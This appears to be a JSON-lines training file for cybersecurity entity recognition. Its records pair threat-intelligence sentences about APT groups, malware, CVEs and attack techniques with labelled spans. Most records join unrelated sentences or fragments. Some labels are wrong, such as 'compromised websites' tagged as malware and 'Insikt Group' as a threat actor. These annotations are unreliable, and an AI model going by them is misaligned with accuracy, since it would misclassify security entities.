"cyberner_stix_train"}} {"text": "Follow the instructions at the bottom of this page . We assess with high confidence that Sea Turtle was targeted in an attempt to re-establish access to the NetNod network , which was previously compromised by this threat actor . 
PROMETHIUM is an activity group that has been active since at least 2012 .", "spans": {"ORGANIZATION: NetNod": [[157, 163]], "THREAT_ACTOR: threat actor": [[215, 227]], "THREAT_ACTOR: PROMETHIUM": [[230, 240]]}, "info": {"id": "cyberner_stix_train_000771", "source": "cyberner_stix_train"}} {"text": "This attack campaign focused on the chemical sector with the goal of obtaining sensitive documents such as proprietary designs , formulas , and manufacturing processes . In 2016 , the threat actors conducted a strategic web compromise ( SWC ) on the website of an international industry organization that affected aerospace , academic , media , technology , government , and utilities organizations around the world .", "spans": {"ORGANIZATION: chemical sector": [[36, 51]], "ORGANIZATION: international industry organization": [[264, 299]], "ORGANIZATION: aerospace": [[314, 323]], "ORGANIZATION: academic": [[326, 334]], "ORGANIZATION: media": [[337, 342]], "ORGANIZATION: technology": [[345, 355]], "ORGANIZATION: government": [[358, 368]], "ORGANIZATION: utilities organizations": [[375, 398]]}, "info": {"id": "cyberner_stix_train_000772", "source": "cyberner_stix_train"}} {"text": "We have identified no collaboration between the two actors , or even an awareness of one by the other .", "spans": {}, "info": {"id": "cyberner_stix_train_000773", "source": "cyberner_stix_train"}} {"text": "ALLMSG – send C & C all SMSs received and sent by user , as stored in phone memory . Symantec detects this threat as Backdoor.Nidiran . 
Our investigation of Leafminer started with the discovery of JavaScript code on several compromised websites in the Middle East .", "spans": {"ORGANIZATION: Symantec": [[85, 93]], "MALWARE: Backdoor.Nidiran": [[117, 133]], "THREAT_ACTOR: Leafminer": [[157, 166]], "MALWARE: JavaScript code": [[197, 212]], "MALWARE: compromised websites": [[224, 244]]}, "info": {"id": "cyberner_stix_train_000774", "source": "cyberner_stix_train"}} {"text": "Finally , a new Windows service is created with the service path pointing to the candidate .exe located in this new directory together with the freshly created , benign-looking DLL . The group has repeatedly used social media , particularly LinkedIn , to identify and interact with employees at targeted organizations , and then used weaponized Excel documents to deliver RATs such as PupyRAT . Executes the payload by overwriting the return address on the stack . The dropper first creates a shortcut file but the dropped DLL is launched with rundll32.exe instead of regsvr32.exe .", "spans": {"SYSTEM: Windows": [[16, 23]], "THREAT_ACTOR: group": [[187, 192]], "ORGANIZATION: social media": [[213, 225]], "TOOL: RATs": [[372, 376]], "TOOL: PupyRAT": [[385, 392]]}, "info": {"id": "cyberner_stix_train_000775", "source": "cyberner_stix_train"}} {"text": "The launcher page picks one of two Flash files to deliver depending upon the target ’s platform ( Windows 32 versus 64bits ) .", "spans": {"TOOL: Flash": [[35, 40]], "SYSTEM: Windows 32": [[98, 108]]}, "info": {"id": "cyberner_stix_train_000776", "source": "cyberner_stix_train"}} {"text": "All the the payloads observed by Cybereason in this campaign were packed by a powerful yet commercial packer called Enigma Packer .", "spans": {"ORGANIZATION: Cybereason": [[33, 43]], "TOOL: Enigma": [[116, 122]]}, "info": {"id": "cyberner_stix_train_000777", "source": "cyberner_stix_train"}} {"text": "The PlugX malware can be configured to use HTTP , DNS , raw TCP , or UDP to avoid network-based detection 
.", "spans": {"MALWARE: PlugX": [[4, 9]]}, "info": {"id": "cyberner_stix_train_000778", "source": "cyberner_stix_train"}} {"text": "The dropper is a repacked legitimate application which contains an additional piece of code – “ loader ” . Threat actors have targeted the government of Thailand and delivered the newly discovered Bookworm Trojan since July 2015 . The early stages of a Dexphot infection involves numerous files and processes . Proxy : Multi - hop Proxy A backdoor used by APT29 created a Tor hidden service to forward traffic from the Tor client to local ports 3389 ( RDP ) , 139 ( Netbios ) , and 445 ( SMB ) enabling full remote access from outside the network and has also used TOR .004", "spans": {"ORGANIZATION: government": [[139, 149]], "TOOL: Bookworm Trojan": [[197, 212]], "MALWARE: Dexphot": [[253, 260]], "MALWARE: Multi - hop Proxy A backdoor": [[319, 347]], "THREAT_ACTOR: APT29": [[356, 361]], "TOOL: TOR": [[565, 568]]}, "info": {"id": "cyberner_stix_train_000779", "source": "cyberner_stix_train"}} {"text": "Attacks on Windows XP allows mobile malware to infect a PC after connecting a smartphone or tablet . Catchamas is a custom Trojan designed to steal information from an infected computer and contains additional features designed to avoid detection . The algorithm used to decrypt the strings is the same as the one used to decrypt the static strings of the module . Who is the Winnti group ?", "spans": {"SYSTEM: Windows XP": [[11, 21]], "MALWARE: Catchamas": [[101, 110]], "THREAT_ACTOR: Winnti group": [[376, 388]]}, "info": {"id": "cyberner_stix_train_000780", "source": "cyberner_stix_train"}} {"text": "The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . 
Insikt Group analysis of network metadata to and from the VPN endpoint IPs revealed consistent connectivity to Citrix-hosted infrastructure from all eight VPN endpoint IPs starting on August 17 , 2018 — the same date the first authenticated login to Visma’s network was made using stolen credentials .", "spans": {"MALWARE: files": [[4, 9]], "VULNERABILITY: Microsoft Office vulnerability": [[33, 63]], "VULNERABILITY: CVE-2012-0158": [[66, 79]], "THREAT_ACTOR: Insikt Group": [[159, 171]], "TOOL: VPN": [[217, 220], [314, 317]], "FILEPATH: Citrix-hosted": [[270, 283]]}, "info": {"id": "cyberner_stix_train_000781", "source": "cyberner_stix_train"}} {"text": "Ongoing activity from attack groups like TA459 who consistently target individuals specializing in particular areas of research and expertise further complicate an already difficult security situation for organizations dealing with more traditional malware threats , phishing campaigns , and socially engineered threats every day .", "spans": {"THREAT_ACTOR: TA459": [[41, 46]]}, "info": {"id": "cyberner_stix_train_000782", "source": "cyberner_stix_train"}} {"text": "Creation date is a week before the start of the tournament . APT32 often deploys these backdoors along with the commercially-available Cobalt Strike BEACON backdoor . Samples in this grouping were all hosted on sites that were called by the second stage . 
We can compare many successful RDP attacks to the equivalent of leaving a window or back door unlocked at our homes , giving the criminal a low barrier to entry .", "spans": {"THREAT_ACTOR: APT32": [[61, 66]], "TOOL: Cobalt Strike BEACON backdoor": [[135, 164]], "VULNERABILITY: giving the criminal a low barrier to entry": [[374, 416]]}, "info": {"id": "cyberner_stix_train_000783", "source": "cyberner_stix_train"}} {"text": "Here the list of the files potentially dropped during the installation stage : FILE NAME STAGE DESCRIPTION d3d9.dll Stage 4 Malware loader used for UAC environments with limited privileges ; also protected by VM obfuscation aepic.dll , sspisrv.dll , userenv.dll Stage 4 Malware loader used in presence of administrative privileges ; executed from ( and injected into ) a fake service ; also protected by VM obfuscation msvcr90.dll Stage 5 Malware payload injected into Since at least 2013 , the Iranian threat group FireEye tracks as APT33 has carried out a cyber espionage operation to collect information from defense , aerospace and petrochemical organizations . A SimpleKeyringInterface class is used to initialize the key , while the IV is passed to the SetCipherWithIV function . 
The government even offered a reward of up to $ 10 million for information on Cl0p after several federal agencies in the US fell victim to the gang .", "spans": {"THREAT_ACTOR: threat group": [[503, 515]], "ORGANIZATION: FireEye": [[516, 523]], "THREAT_ACTOR: APT33": [[534, 539]], "ORGANIZATION: defense": [[612, 619]], "ORGANIZATION: aerospace": [[622, 631]], "ORGANIZATION: petrochemical organizations": [[636, 663]], "TOOL: SimpleKeyringInterface": [[668, 690]], "TOOL: SetCipherWithIV": [[759, 774]], "ORGANIZATION: government": [[790, 800]], "THREAT_ACTOR: Cl0p": [[864, 868]], "ORGANIZATION: several federal agencies": [[875, 899]], "THREAT_ACTOR: the gang": [[925, 933]]}, "info": {"id": "cyberner_stix_train_000784", "source": "cyberner_stix_train"}} {"text": "PLATINUM 's approach toward exploiting vulnerabilities varies between campaigns . Only one incident involving a Russian bank was promptly identified and prevented that is known to Group-IB .", "spans": {"THREAT_ACTOR: PLATINUM": [[0, 8]], "ORGANIZATION: bank": [[120, 124]], "ORGANIZATION: Group-IB": [[180, 188]]}, "info": {"id": "cyberner_stix_train_000785", "source": "cyberner_stix_train"}} {"text": "The Backdoor : System malware ( mcpef.apk and brother.apk ) This tries a few persistence methods by using few anti-uninstall techniques ( described below ) and downloads and executes code from server without user consent . PittyTiger has also been seen using Heartbleed vulnerability in order to directly get valid credentials . 
Since exposure of its operations in 2013 , APT10 has made a number of significant changes intended to thwart detection of its campaigns .", "spans": {"THREAT_ACTOR: PittyTiger": [[223, 233]], "VULNERABILITY: Heartbleed vulnerability": [[259, 283]], "THREAT_ACTOR: APT10": [[372, 377]]}, "info": {"id": "cyberner_stix_train_000786", "source": "cyberner_stix_train"}} {"text": "LEAD and BARIUM are not known for large-scale spear-phishing , so it is unlikely that SOC personnel would have to deal with multiple machines having been compromised by these groups at the same time .", "spans": {"THREAT_ACTOR: LEAD": [[0, 4]], "THREAT_ACTOR: BARIUM": [[9, 15]]}, "info": {"id": "cyberner_stix_train_000787", "source": "cyberner_stix_train"}} {"text": "While tracking APT28 , we noted the group ’s interest in foreign governments and militaries , particularly those of European and Eastern European nations , as well as regional security organizations , such as the North Atlantic Treaty Organization ( NATO ) and the Organization for Security and Cooperation in Europe ( OSCE ) , among others .", "spans": {"THREAT_ACTOR: APT28": [[15, 20]], "ORGANIZATION: North Atlantic Treaty Organization": [[213, 247]], "ORGANIZATION: NATO": [[250, 254]], "ORGANIZATION: Organization for Security and Cooperation in Europe": [[265, 316]], "ORGANIZATION: OSCE": [[319, 323]]}, "info": {"id": "cyberner_stix_train_000788", "source": "cyberner_stix_train"}} {"text": "To improve coverage while minimizing false positives , Windows Defender ATP uses the intelligent security graph to differentiate between suspicious and benign behavior before generating alerts .", "spans": {"TOOL: Windows Defender ATP": [[55, 75]]}, "info": {"id": "cyberner_stix_train_000789", "source": "cyberner_stix_train"}} {"text": "But rather than trying to pursue some comparison between the two for identification of superiority ( an approach that will result in unproductive argument and social media warring ) , the point of this post is to 
highlight the distinctions between these approaches and how – in the case of “ the TRITON actor ” – they result in noticeably different conclusions from similar datasets .", "spans": {"MALWARE: TRITON": [[296, 302]]}, "info": {"id": "cyberner_stix_train_000790", "source": "cyberner_stix_train"}} {"text": "This feature was enabled only in newer versions of TrickMo that were tailored specifically for German banks and use a special application for implementing TAN-based 2FA . The malware checks whether its running on a 32-bit or 64-bit system to determine which PowerShell script to grab from the command and control (C2) server . the group 's targets include an embassy in Belgium .", "spans": {"MALWARE: TrickMo": [[51, 58]], "TOOL: PowerShell script": [[258, 275]], "ORGANIZATION: embassy": [[359, 366]]}, "info": {"id": "cyberner_stix_train_000791", "source": "cyberner_stix_train"}} {"text": "Stolen Data Figure 8 : Sending data to the attacker . The most recent sample of Bemstour seen by Symantec appears to have been compiled on March 23 , 2019 , eleven days after the zero-day vulnerability was patched by Microsoft . Threat Group-1314 : TG-1314 .", "spans": {"MALWARE: Bemstour": [[80, 88]], "ORGANIZATION: Symantec": [[97, 105]], "THREAT_ACTOR: Threat Group-1314": [[229, 246]], "THREAT_ACTOR: TG-1314": [[249, 256]]}, "info": {"id": "cyberner_stix_train_000792", "source": "cyberner_stix_train"}} {"text": "Discovered for the first time in Mexico back in 2013 , Ploutus enabled criminals to empty ATMs using either an external keyboard attached to the machine or via SMS message , a technique that had never been seen before . 
Several times , APT5 has targeted organizations and personnel based in Southeast Asia .", "spans": {"MALWARE: Ploutus": [[55, 62]], "THREAT_ACTOR: APT5": [[236, 240]], "ORGANIZATION: organizations": [[254, 267]], "ORGANIZATION: personnel": [[272, 281]]}, "info": {"id": "cyberner_stix_train_000793", "source": "cyberner_stix_train"}} {"text": "CTU researchers have observed TG-3390 compromising a target organization's externally and internally accessible assets , such as an OWA server , and adding redirect code to point internal users to an external website that hosts an exploit and delivers malware .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: TG-3390": [[30, 37]], "TOOL: OWA": [[132, 135]]}, "info": {"id": "cyberner_stix_train_000794", "source": "cyberner_stix_train"}} {"text": "Commands Arguments SCREENSHOT None SYS_INFO None GET_NETWORK None SCAN_ALL None .", "spans": {}, "info": {"id": "cyberner_stix_train_000795", "source": "cyberner_stix_train"}} {"text": "Interestingly , \" mundizza '' is typical of Calabria , a region in the south of Italy , and more specifically it appears to be language native of the city of Catanzaro . TA549 possesses a diverse malware arsenal including PlugX , NetTraveler , and ZeroT . 
The macro code does the following : COSMICENERGY Possibly Associated With Russian Government - Funded Power Disruption and Emergency Response Exercises During our analysis of COSMICENERGY , we identified a comment in the code that indicated the sample uses a module associated with a project named “ Solar Polygon ” ( Figure 2 ) .", "spans": {"THREAT_ACTOR: TA549": [[170, 175]], "TOOL: PlugX": [[222, 227]], "TOOL: NetTraveler": [[230, 241]], "TOOL: ZeroT": [[248, 253]], "MALWARE: COSMICENERGY": [[292, 304], [431, 443]], "ORGANIZATION: Russian Government": [[330, 348]]}, "info": {"id": "cyberner_stix_train_000796", "source": "cyberner_stix_train"}} {"text": "Executing the modified applications obtained this way would result in the victim being infected with unidentified malware .", "spans": {}, "info": {"id": "cyberner_stix_train_000797", "source": "cyberner_stix_train"}} {"text": "The group's primary and likely proprietary RCSession RAT communicates with a hard-coded C2 server using a custom protocol over TCP port 443 .", "spans": {"MALWARE: RCSession": [[43, 52]], "TOOL: C2": [[88, 90]]}, "info": {"id": "cyberner_stix_train_000798", "source": "cyberner_stix_train"}} {"text": "] 205 [ . For these CozyDuke campaigns however , the Dukes appear to have employed two particular later-stage toolsets , SeaDuke and HammerDuke . In the variants that were obtained during this campaign the file contained a PowerShell script that was approximately 2800 lines . 
The popularity of social network and media platforms remain on the rise , and we expect cybercriminals to be naturally drawn towards exploiting them however they can .", "spans": {"THREAT_ACTOR: Dukes": [[53, 58]], "TOOL: SeaDuke": [[121, 128]], "TOOL: HammerDuke": [[133, 143]], "TOOL: PowerShell": [[223, 233]], "TOOL: social network and media platforms": [[295, 329]], "THREAT_ACTOR: cybercriminals": [[365, 379]]}, "info": {"id": "cyberner_stix_train_000799", "source": "cyberner_stix_train"}} {"text": "‘ One-time ’ domains also appeared with names made up of random strings of characters and numbers , combined with the top-level domains .cf , .ga , .gq , .ml , or .tk . The HTA files contained job descriptions and links to job postings on popular employment websites . The WannaCry malware consists of two distinct components , one that provides ransomware functionality and a component used for propagation , which contains functionality to enable SMB exploitation capabilities .", "spans": {"MALWARE: HTA files": [[173, 182]], "MALWARE: WannaCry": [[273, 281]], "MALWARE: malware": [[282, 289]], "MALWARE: SMB": [[449, 452]]}, "info": {"id": "cyberner_stix_train_000800", "source": "cyberner_stix_train"}} {"text": "UNITEDRAKE is described as a \" fully extensible \" data collection tool that is specifically developed for Windows machines to allow operators the chance of controlling a device completely . 
After reviewing all the malware functionalities , we are confident in saying that the attackers look for victims who answer well-defined characteristics and believe that further stages of the attack are delivered only to those who fit the specific victim profile .", "spans": {"TOOL: UNITEDRAKE": [[0, 10]], "THREAT_ACTOR: attackers": [[276, 285]], "ORGANIZATION: victims who answer": [[295, 313]]}, "info": {"id": "cyberner_stix_train_000801", "source": "cyberner_stix_train"}} {"text": "Flash Player com.mwmnfwt.arhkrgajn ffa5ac3460998e7b9856fc136ebcd112196c3abf24816ccab1fbae11eae4954c Flash Player com.wogdjywtwq.oiofvpzpxyo 6ac7e7ed83b4b57cc4d28f14308d69d062d29a544bbde0856d5697b0fc50cde4 Flash Player com.hvdnaiujzwo.fovzeukzywfr Until 2019 , SectorJ04 group had carried out massive website-based hacking activities that mainly utilize ransomware and banking trojans for financial profit , and has also been carrying out information gathering activities to secure attack resources such as email accounts and system login information from users since 2019 . 
Symantec discovered the most recent wave of Tick attacks in July 2015 , when the group compromised three different Japanese websites with a Flash ( .swf ) exploit to mount watering hole attacks .", "spans": {"SYSTEM: Flash Player": [[0, 12], [100, 112], [205, 217]], "THREAT_ACTOR: SectorJ04": [[260, 269]], "TOOL: ransomware": [[353, 363]], "TOOL: banking trojans": [[368, 383]], "ORGANIZATION: Symantec": [[574, 582]]}, "info": {"id": "cyberner_stix_train_000802", "source": "cyberner_stix_train"}} {"text": "Our investigation shines a light on an often unknown and seedier secret life of code-signing certificates , which is completely unknown to their owners .", "spans": {}, "info": {"id": "cyberner_stix_train_000803", "source": "cyberner_stix_train"}} {"text": "• Change server domain Out of these , the most interesting command is the “ install app ” command that downloads an encrypted zip file containing the second phase dex file , unpacks and loads it . We identified APT33 malware tied to an Iranian persona who may have been employed by the Iranian government to conduct cyber threat activity against its adversaries . Like mentioned in modules file names the malware consists of several working threads dedicated to different tasks, including C2 command parsing and data . 
Among the IP addresses owned by Hack520 is a whole/22 IP Range which we dubbed as the “ PIG RANGE ” .", "spans": {"TOOL: APT33 malware": [[211, 224]], "TOOL: C2": [[489, 491]], "THREAT_ACTOR: Hack520": [[551, 558]]}, "info": {"id": "cyberner_stix_train_000804", "source": "cyberner_stix_train"}} {"text": "Figure 14 : Information theft via fake credit card verification using stolen branding Figure 15 : Information theft via fake credit card verification using stolen branding Some of the campaigns appear to have a wider reach based on bit.ly statistics like this one from October 13 , 2017 : Figure 16 : bit.ly statistics for an October 13 , 2017 campaign Over several days during the last three months , Proofpoint researchers observed campaigns using similar techniques targeting the banking customers of Raffeisen and Sparkasse . Once in Frankfurt CIA hackers can travel without further border checks to the 25 European countries that are part of the Shengen open border area — including France , Italy and Switzerland . This group is also known as Shell Crew , WebMasters , KungFu Kittens , and PinkPanther .", "spans": {"ORGANIZATION: Proofpoint": [[402, 412]], "THREAT_ACTOR: CIA": [[548, 551]], "THREAT_ACTOR: Shell Crew": [[749, 759]], "THREAT_ACTOR: WebMasters": [[762, 772]], "THREAT_ACTOR: KungFu Kittens": [[775, 789]], "THREAT_ACTOR: PinkPanther": [[796, 807]]}, "info": {"id": "cyberner_stix_train_000805", "source": "cyberner_stix_train"}} {"text": "APT28 continues to evolve its toolkit and refine its tactics in what is almost certainly an effort to protect its operational effectiveness in the face of heightened public exposure and scrutiny .", "spans": {"THREAT_ACTOR: APT28": [[0, 5]]}, "info": {"id": "cyberner_stix_train_000806", "source": "cyberner_stix_train"}} {"text": "Figure 14 . The threat actors used two publicly available techniques , an AppLocker whitelisting bypass and a script to inject shellcode into the userinit.exe process . 
This attack resembles previous attacks by HIDDEN COBRA conducted against the SWIFT .", "spans": {"THREAT_ACTOR: actors": [[23, 29]], "MALWARE: userinit.exe": [[146, 158]], "THREAT_ACTOR: HIDDEN COBRA": [[211, 223]]}, "info": {"id": "cyberner_stix_train_000807", "source": "cyberner_stix_train"}} {"text": "The attack was detected as part of a spear phishing against a government organization in Europe in late May 2016 . Trochilus was first reported by Arbor Networks in their Seven Pointed Dagger report tying its use to other targeted Southeast Asia activity .", "spans": {"ORGANIZATION: government organization": [[62, 85]], "MALWARE: Trochilus": [[115, 124]], "ORGANIZATION: Arbor Networks": [[147, 161]]}, "info": {"id": "cyberner_stix_train_000808", "source": "cyberner_stix_train"}} {"text": "ORat acts as a flexible loader tool rather than a fully featured remote access tool .", "spans": {"MALWARE: ORat": [[0, 4]]}, "info": {"id": "cyberner_stix_train_000809", "source": "cyberner_stix_train"}} {"text": "He is responsible for developing tools for conducting attacks and is also able to modify complex exploits and third party software . Once an exploitable page is identified , Clever Kitten will attempt to upload a PHP backdoor to gain remote access to the system .", "spans": {}, "info": {"id": "cyberner_stix_train_000810", "source": "cyberner_stix_train"}} {"text": "Like Dridex , Locky is also distributed in an affiliate model ; TA505 exclusively distributes Locky Affid=3 .", "spans": {"MALWARE: Dridex": [[5, 11]], "MALWARE: Locky": [[14, 19], [94, 99]], "THREAT_ACTOR: TA505": [[64, 69]]}, "info": {"id": "cyberner_stix_train_000811", "source": "cyberner_stix_train"}} {"text": "] 99 [ . Our visibility into the operations of APT28 - a group we believe the Russian Government sponsors - has given us insight into some of the government 's targets , as well as its objectives and the activities designed to further them . 
The send counter is used to track the number of chunks sent to the . Given Sandworm ’s global threat activity and novel OT capabilties , we urge OT asset owners to take action to mitigate this threat .", "spans": {"THREAT_ACTOR: APT28": [[47, 52]], "THREAT_ACTOR: group": [[57, 62]], "ORGANIZATION: government": [[146, 156]], "ORGANIZATION: OT": [[387, 389]]}, "info": {"id": "cyberner_stix_train_000812", "source": "cyberner_stix_train"}} {"text": "Here is a list of their similarities .", "spans": {}, "info": {"id": "cyberner_stix_train_000813", "source": "cyberner_stix_train"}} {"text": "BLOCKER_UPDATE_START – display fake HTML page for update . Data from the early part of this year shows that the Taidoor attackers rampantly used malicious.DOC files to exploit a Microsoft Common Controls vulnerability , CVE-2012-0158 . Another intrusion approach used by Leafminer seems a lot less sophisticated than the previously described methods but can be just as effective : using specific hacktools to guess the login passwords for services exposed by a targeted system .", "spans": {"MALWARE: malicious.DOC": [[145, 158]], "VULNERABILITY: Microsoft Common Controls vulnerability": [[178, 217]], "VULNERABILITY: CVE-2012-0158": [[220, 233]], "THREAT_ACTOR: Leafminer": [[271, 280]], "MALWARE: hacktools": [[396, 405]]}, "info": {"id": "cyberner_stix_train_000814", "source": "cyberner_stix_train"}} {"text": "The following shows this unused command , which exposed an additional server within Sofacy ’s infrastructure would download and execute an encoded PowerShell script from 92.114.92.102 .", "spans": {"THREAT_ACTOR: Sofacy": [[84, 90]], "TOOL: PowerShell": [[147, 157]], "IP_ADDRESS: 92.114.92.102": [[170, 183]]}, "info": {"id": "cyberner_stix_train_000815", "source": "cyberner_stix_train"}} {"text": "The only known infection vector for SeaDuke is via an existing CozyDuke infection , wherein CozyDuke downloads and executes the SeaDuke toolset .", "spans": {"MALWARE: SeaDuke": [[36, 43], 
[128, 135]], "MALWARE: CozyDuke": [[63, 71], [92, 100]]}, "info": {"id": "cyberner_stix_train_000816", "source": "cyberner_stix_train"}} {"text": "The activities continue : the most recently observed domain was registered on October 31 , 2017 . Based on our analysis , we can confirm that MuddyWater target Turkish government organizations related to the finance and energy sectors . Cobalt Group is a financially motivated threat group that has primarily targeted financial institutions .", "spans": {"THREAT_ACTOR: MuddyWater": [[142, 152]], "ORGANIZATION: Turkish government organizations": [[160, 192]], "ORGANIZATION: finance": [[208, 215]], "ORGANIZATION: energy": [[220, 226]], "THREAT_ACTOR: Cobalt Group": [[237, 249]]}, "info": {"id": "cyberner_stix_train_000817", "source": "cyberner_stix_train"}} {"text": "It seems that the main objective of the attackers was information gathering from the infected computers . The document , when opened , used an embedded ActiveX control to download a JavaScript file from a remote site that used a previously unknown vulnerability in some versions of Windows ( later designated CVE-2013-7331 ) to read information about the browser 's installed components .", "spans": {"MALWARE: ActiveX control": [[152, 167]], "FILEPATH: JavaScript file": [[182, 197]], "SYSTEM: Windows": [[282, 289]], "VULNERABILITY: CVE-2013-7331": [[309, 322]]}, "info": {"id": "cyberner_stix_train_000818", "source": "cyberner_stix_train"}} {"text": "The document files exploit at least three known vulnerabilities in Microsoft Office , which we discuss in the Infection Techniques section . 
In fact , REDBALDKNIGHT has been targeting Japan as early as 2008 , based on the file properties of the decoy documents they've been sending to their targets .", "spans": {"MALWARE: document files": [[4, 18]], "VULNERABILITY: vulnerabilities": [[48, 63]], "THREAT_ACTOR: REDBALDKNIGHT": [[151, 164]], "FILEPATH: decoy documents": [[245, 260]]}, "info": {"id": "cyberner_stix_train_000819", "source": "cyberner_stix_train"}} {"text": "The overall process to result in a successful exploitation is :", "spans": {}, "info": {"id": "cyberner_stix_train_000820", "source": "cyberner_stix_train"}} {"text": "They have been well documented and well researched with much of their attack methodologies exposed .", "spans": {}, "info": {"id": "cyberner_stix_train_000821", "source": "cyberner_stix_train"}} {"text": "While much of the industry focuses on the threats of hardware implants , we can see in this example that adversaries are happy to exploit simpler configuration and security issues to achieve their objectives .", "spans": {}, "info": {"id": "cyberner_stix_train_000822", "source": "cyberner_stix_train"}} {"text": "They seem to have specialized knowledge about military operations , as they are focused on stealing specific files such as those that describe navigation routes . 
Longhorn , which we internally refer to as \" The Lamberts \" , first came to the attention of the ITSec community in 2014 , when our colleagues from FireEye discovered an attack using a zero day vulnerability ( CVE-2014-4148 ) .", "spans": {"THREAT_ACTOR: They": [[0, 4]], "ORGANIZATION: military": [[46, 54]], "THREAT_ACTOR: The Lamberts": [[208, 220]], "ORGANIZATION: ITSec community": [[260, 275]], "ORGANIZATION: FireEye": [[311, 318]], "VULNERABILITY: zero day": [[348, 356]], "VULNERABILITY: vulnerability": [[357, 370]], "VULNERABILITY: CVE-2014-4148": [[373, 386]]}, "info": {"id": "cyberner_stix_train_000823", "source": "cyberner_stix_train"}} {"text": "The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 (EternalBlue) that we saw uploaded to the other errr.aspx webshell . In a more recent version of the modified Gh0st RAT malware , Ghost Dragon implemented dynamic packet flags which change the first five bytes of the header in every login request with the controller .", "spans": {"TOOL: python script": [[63, 76]], "VULNERABILITY: CVE-2017-0144": [[132, 145]], "MALWARE: errr.aspx": [[194, 203]], "FILEPATH: Gh0st RAT": [[256, 265]], "THREAT_ACTOR: Ghost Dragon": [[276, 288]]}, "info": {"id": "cyberner_stix_train_000824", "source": "cyberner_stix_train"}} {"text": "Command & Controls ad1.fbsba [ . Based on information gained from discussion with the initial TRITON/TRISIS responders and subsequent work on follow-on activity by this entity , Dragos developed a comprehensive ( public ) picture of adversary activity roughly matching FireEye 's analysis published in April 2019 , described in various media . 
campaign targets Palestinian individuals and entities in the Middle East , specifically directed at We searched for the unique string and identified a single match to a cyber range ( aka polygon ) developed by Rostelecom - Solar , a Russian cyber security company that received a government in 2019 to begin training cyber security experts and conducting electric power disruption and emergency response exercises .", "spans": {"TOOL: TRITON/TRISIS": [[94, 107]], "ORGANIZATION: Dragos": [[178, 184]], "ORGANIZATION: FireEye": [[269, 276]], "ORGANIZATION: media": [[336, 341]], "ORGANIZATION: cyber range": [[513, 524]], "ORGANIZATION: aka polygon": [[527, 538]], "ORGANIZATION: Rostelecom - Solar": [[554, 572]], "ORGANIZATION: Russian cyber security company": [[577, 607]]}, "info": {"id": "cyberner_stix_train_000825", "source": "cyberner_stix_train"}} {"text": "The persistent use of social media to identify and manipulate victims indicates that COBALT GYPSY successfully achieves its objectives using this tactic . The JavaScript forces visiting web browsers to collect and send (via a POST request) web browser , browser version , country of origin , and IP address data to the attacker controlled server jquerycodedownload.live/check.aspx” .", "spans": {"ORGANIZATION: social media": [[22, 34]], "THREAT_ACTOR: COBALT GYPSY": [[85, 97]], "FILEPATH: JavaScript": [[159, 169]]}, "info": {"id": "cyberner_stix_train_000826", "source": "cyberner_stix_train"}} {"text": "The malware known as Tafacalou ( aka \" TFC \" , \" Transporter \" ) is perhaps of greatest interest here , because it acts as an entry point for the more sophisticated spy platforms Babar and Dino . 
From 2013 Carbanak intensified its activity focused on banks and electronic payment systems in Russia and in the post-Soviet space .", "spans": {"TOOL: Tafacalou": [[21, 30]], "TOOL: TFC": [[39, 42]], "TOOL: Transporter": [[49, 60]], "TOOL: Babar": [[179, 184]], "TOOL: Dino": [[189, 193]], "MALWARE: Carbanak": [[206, 214]], "ORGANIZATION: banks": [[251, 256]], "ORGANIZATION: electronic payment": [[261, 279]], "ORGANIZATION: space": [[321, 326]]}, "info": {"id": "cyberner_stix_train_000827", "source": "cyberner_stix_train"}} {"text": "In recent years , online activity has gradually been shifting from personal computers to mobile devices . Despite being an older vulnerability , many threat actors continue to leverage CVE-2012-0158 to exploit Microsoft Word . It is highly likely that this is due to the release of the 2013 FireEye report .", "spans": {"VULNERABILITY: CVE-2012-0158": [[185, 198]], "MALWARE: Microsoft Word": [[210, 224]], "ORGANIZATION: FireEye": [[291, 298]]}, "info": {"id": "cyberner_stix_train_000828", "source": "cyberner_stix_train"}} {"text": "It contains two tables – ‘ supported_devices ’ and ‘ device_address ’ . these threat actors targeted a number of government agencies Threat actors targeted a number of government agencies in East Asia . Operation Soft Cell is a group that is reportedly affiliated with China and is likely state-sponsored .", "spans": {"THREAT_ACTOR: Threat actors": [[133, 146]], "ORGANIZATION: government": [[168, 178]], "ORGANIZATION: agencies": [[179, 187]], "THREAT_ACTOR: Soft Cell": [[213, 222]]}, "info": {"id": "cyberner_stix_train_000829", "source": "cyberner_stix_train"}} {"text": "The function onUserLeaveHint ( ) is called whenever the malware screen is pushed to background , causing the in-call Activity to be automatically brought to the foreground . 
As the crisis in Syria escalates , FireEye researchers have discovered a cyber espionage campaign , which we call \" Ke3chang \" , that falsely advertises information updates about the ongoing crisis to compromise MFA networks in Europe . . The campaign started in at least June 2023 , and the ransom note appears to mimic certain aspects of the ransom note used in the global WannaCry attacks from 2017 .", "spans": {"ORGANIZATION: FireEye": [[209, 216]], "THREAT_ACTOR: Ke3chang": [[290, 298]]}, "info": {"id": "cyberner_stix_train_000830", "source": "cyberner_stix_train"}} {"text": "Enabling the “ Toggle Field Codes ” feature reveals the DDE instructions to us and shows that the author had set instructions to size 1 font and with a white coloring .", "spans": {}, "info": {"id": "cyberner_stix_train_000831", "source": "cyberner_stix_train"}} {"text": "Allows an application to initiate a phone call without going through the Dialer user interface for the user to confirm the call . After infestation , Weeping Angel places the target TV in a 'Fake-Off' mode , so that the owner falsely believes the TV is off when it is on . FIN7 is a financially-motivated threat group that has primarily targeted the U.S. retail , restaurant , and hospitality sectors since mid-2015 .", "spans": {"THREAT_ACTOR: Weeping Angel": [[150, 163]], "THREAT_ACTOR: FIN7": [[273, 277]]}, "info": {"id": "cyberner_stix_train_000832", "source": "cyberner_stix_train"}} {"text": "The SpyNote RAT registers a service called AutoStartup and a broadcast receiver named BootComplete . The Silence.Main Trojan , which is the main stage of the attack , has a full set of commands to control a compromised computer . 
